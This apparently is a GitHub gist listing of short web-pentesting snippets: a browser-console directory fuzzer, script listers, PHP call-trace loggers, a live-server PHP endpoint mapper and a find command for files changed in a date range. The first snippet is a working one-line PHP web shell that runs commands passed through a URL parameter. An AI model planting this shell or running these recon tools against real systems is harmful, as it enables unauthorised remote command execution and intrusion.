Mihály Gábor kecs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?> |
kecs
/ dirs_used_by_u_in_time.sh
Last active
December 14, 2019 14:46
List readable files accessed by user at a time period, when user was active.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| find / -type f -newermt 2019-07-07 ! -newermt 2019-07-31 -ls -readable 2> /dev/null |
kecs
/ jsConsoleWordlistFuzz.js
Created
December 13, 2019 14:50
Discover web content from js console
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function fuzz(){ | |
| // Replace with any online newline separated word list | |
| var WORDLIST_URL = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt"; | |
| var WORDLIST = []; | |
| var xhttp = new XMLHttpRequest(); | |
| // Fetch wordlist | |
| xhttp.open("GET", WORDLIST_URL, false); | |
| xhttp.onreadystatechange = function() { | |
| if (this.readyState == 4 && this.status == 200) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys, re, time | |
| import pyperclip | |
| texts = [] | |
| while 1: | |
| sys.stdout.flush() |
kecs
/ get_scripts.py
Created
November 10, 2019 12:21
Download list of scripts loaded by site, greppable.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # pip install jsbeautifier requests | |
| import os | |
| import requests | |
| from jsbeautifier import beautify | |
| try: | |
| os.mkdir('js') | |
| except OSError: | |
| pass |
kecs
/ listLoadedScriptsFromConsole.js
Created
November 10, 2019 11:39
List scripts loaded by page from console
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for(i=0;i<document.scripts.length;i++)console.log(document.scripts[i].src) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| script=document.createElement('script');document.head.appendChild(script);script.src='https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js'; |
kecs
/ log_php_fn_calls.py
Created
November 1, 2019 13:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| """ | |
| Recursively traverse a php repo, | |
| add a line that logs fn calls. | |
| Non overlapping matches. | |
| cd into project root. | |
| """ |
kecs
/ map_reachable_phps.py
Created
March 22, 2019 09:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests, time, os | |
| """ | |
| List all .php files in repo, send GET and POST to live url, print response if it is not 404 | |
| Start from repo root dir. | |
| Args: base_url_to_live_server | |
| """ | |
| COOKIES = {'SESSID': '', 'PHPSESSID': ''} |
kecs
/ add_php_calltrace.py
Created
March 11, 2019 13:13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os, re, sys | |
| """ | |
| Recursively traverse a php repo, add a line that logs fn calls. | |
| Non overlapping matches! | |
| Arg: output file full path | |
| """ | |
| OUTFILE = sys.argv[1] |
NewerOlder